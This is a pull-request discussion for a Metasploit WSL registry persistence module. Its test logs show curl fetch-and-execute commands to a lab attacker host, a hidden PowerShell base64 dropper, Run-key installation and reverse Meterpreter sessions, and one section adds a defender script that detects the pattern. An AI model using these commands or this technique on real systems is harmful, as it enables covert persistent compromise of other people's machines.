Conversation


@h00die h00die commented Nov 16, 2025

Fixes #20683
Creates a new Windows persistence by putting a LINUX payload in WSL and executing it from the registry. Does your Windows AV detect Linux payloads? Hope so!

Also ninjas in a patch for where a crash would happen with reverse_ssh payloads because there was no wfsdelay.

Verification

  • Start msfconsole
  • exploit the box somehow
  • use exploit/windows/persistence/wsl/registry
  • set SESSION <id>
  • exploit
  • Verify persistence is created
  • Verify cleanup works
  • Document is updated and correct

@msutovsky-r7

msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./vTOasmulJkca http://192.168.168.128:8080/Qkf34tA1N4T--896aQCPmg;chmod +x ./vTOasmulJkca;./vTOasmulJkca&
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Qkf34tA1N4T--896aQCPmg
[*] Started reverse TCP handler on 192.168.168.128:9999 
msf exploit(windows/persistence/wsl/registry) > [!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cLlzpsCSmQjDhZN
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/FNiiQC
powershell.exe -WindowStyle Hidden -Command "wsl bash -lc 'echo Y3VybCAtc28gLi92VE9hc211bEprY2EgaHR0cDovLzE5Mi4xNjguMTY4LjEyODo4MDgwL1FrZjM0dEExTjRULS04OTZhUUNQbWc7Y2htb2QgK3ggLi92VE9hc211bEprY2E7Li92VE9hc211bEprY2Em | base64 -d > /home/ms/FNiiQC'"
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\7PVpLpaz
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251118.5820/DESKTOP-FL6SVUR_20251118.5820.rc
[*] 192.168.168.221 - Meterpreter session 11 closed.  Reason: Died
[*] 192.168.168.221 - Meterpreter session 12 closed.  Reason: Died
[*] Client 192.168.168.221 requested /Qkf34tA1N4T--896aQCPmg
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 13 opened (192.168.168.128:9999 -> 192.168.168.221:59372) at 2025-11-18 16:00:25 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  13        meterpreter x64/linux  ms @ DESKTOP-FL6SVUR.localdomain  192.168.168.128:9999 -> 192.168.168.221:59372 (::1)

msf exploit(windows/persistence/wsl/registry) > sessions  13
[*] Starting interaction with 13...

meterpreter > sysinfo 
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms
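As an added defender-side example (not code from the PR or from the Metasploit module), the Python below inspects HKCU Run values for the launcher shape printed in the test output above: a hidden PowerShell window running `wsl bash -lc` that echoes a base64 blob through `base64 -d` into a file inside the distro, then decodes the blob so the fetched-and-executed dropper becomes visible. The sample dict is constructed here; its 7PVpLpaz entry is the command shown in the output above, the OneDrive entry is a made-up benign autostart, and the regex is an assumption tied to this module's launcher rather than a general WSL signature.

```python
import base64
import re
from dataclasses import dataclass, field

# Launcher shape seen in the PR output: powershell runs `wsl bash -lc`, echoes a base64
# blob through `base64 -d` into a file inside the distro (assumed pattern, not a general rule).
WSL_B64_RE = re.compile(
    r"wsl(?:\.exe)?\s+bash\s+-lc\s+'echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*>\s*([^']+)'",
    re.IGNORECASE,
)
DROPPER_HINTS = ("curl ", "wget ", "chmod +x")  # what a fetch-then-execute dropper looks like

@dataclass
class Finding:
    value_name: str
    suspicious: bool = False
    reasons: list = field(default_factory=list)
    decoded: str = ""     # content the blob writes into the WSL distro, if any
    written_to: str = ""  # Linux path it is written to

def inspect_run_value(value_name: str, command: str) -> Finding:
    """Classify one Run-key value, collecting the evidence behind the verdict."""
    f = Finding(value_name)
    low = command.lower()
    if "wsl" not in low:
        return f  # only WSL launchers are in scope for this check
    f.reasons.append("Run value launches WSL")
    if "-windowstyle hidden" in low:
        f.reasons.append("hidden PowerShell window")
    m = WSL_B64_RE.search(command)
    if m:
        f.written_to = m.group(2)
        try:
            f.decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            f.reasons.append(f"base64 blob decoded into {f.written_to}")
        except ValueError:
            f.reasons.append("undecodable base64 blob")
        f.reasons += [f"decoded content contains {h.strip()!r}" for h in DROPPER_HINTS if h in f.decoded]
    f.suspicious = len(f.reasons) >= 2  # a WSL launch alone is not enough; require a second indicator
    return f

def scan_run_values(values: dict) -> dict:
    return {name: inspect_run_value(name, cmd) for name, cmd in values.items()}

# Constructed sample: '7PVpLpaz' is the command printed in the PR test output above,
# 'OneDrive' is a made-up benign autostart entry that must not be flagged.
BLOB = ("Y3VybCAtc28gLi92VE9hc211bEprY2EgaHR0cDovLzE5Mi4xNjguMTY4LjEyODo4MDgwL1FrZjM0dEExTjRULS04OTZhUUNQbWc7"
        "Y2htb2QgK3ggLi92VE9hc211bEprY2E7Li92VE9hc211bEprY2Em")
SAMPLE_RUN_VALUES = {
    "7PVpLpaz": f"powershell.exe -WindowStyle Hidden -Command \"wsl bash -lc 'echo {BLOB} | base64 -d > /home/ms/FNiiQC'\"",
    "OneDrive": r'"C:\Users\ms\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
```

On a Windows host the dict can be filled from the live key with `winreg` (`HKEY_CURRENT_USER`, `Software\Microsoft\Windows\CurrentVersion\Run`) and handed to `scan_run_values`; the cleanup RC file the module writes removes only the Run value, so the dropped file under the WSL home directory (`written_to`) should be checked separately.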


h00die commented Nov 18, 2025

Good to see it tested on WSL 2!


@msutovsky-r7 msutovsky-r7 left a comment


msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./OuYASrLw http://192.168.168.128:8080/HygsSaoDfedPTzwLqWRI2A;chmod +x ./OuYASrLw;./OuYASrLw&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/wsl/registry) > 
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /HygsSaoDfedPTzwLqWRI2A
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rjxAUFrhShlH6RC
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/vLcySFDA
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\972rGv1z
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251119.1506/DESKTOP-FL6SVUR_20251119.1506.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died

msf exploit(windows/persistence/wsl/registry) > 
[*] Client 192.168.168.221 requested /HygsSaoDfedPTzwLqWRI2A
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Command shell session 2 opened (192.168.168.128:4444 -> 192.168.168.221:51234) at 2025-11-19 12:17:03 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

id
uid=1000(ms) gid=1000(ms) groups=1000(ms),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users)

@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 20, 2025

@msutovsky-r7 msutovsky-r7 left a comment


msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./siucFmDu http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./siucFmDu;./siucFmDu&
[*] Exploit running as background job 0.
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /M1We21fZKyvgtWK9IWStLA
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XtZdtoBY3e6LPMq
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/EhYwlsGxQUDG. WSL may take a little while to start up...
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\0P4pS3uk
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251120.5607/DESKTOP-FL6SVUR_20251120.5607.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died
[*] Client 192.168.168.221 requested /M1We21fZKyvgtWK9IWStLA
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.221:56566) at 2025-11-20 11:58:22 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Nov 20, 2025
@msutovsky-r7 msutovsky-r7 merged commit e2097ee into rapid7:master Nov 20, 2025
67 of 75 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Nov 20, 2025

msutovsky-r7 commented Nov 20, 2025

Release Notes

Adds a new Windows persistence module - the WSL registry module. The module will create registry entries (Run, RunOnce) to run a Linux payload stored in WSL.

@h00die h00die deleted the windows_wsl_persistence branch November 20, 2025 21:53
Development

Successfully merging this pull request may close these issues.

payload/cmd/unix/reverse_ssh payload broken

2 participants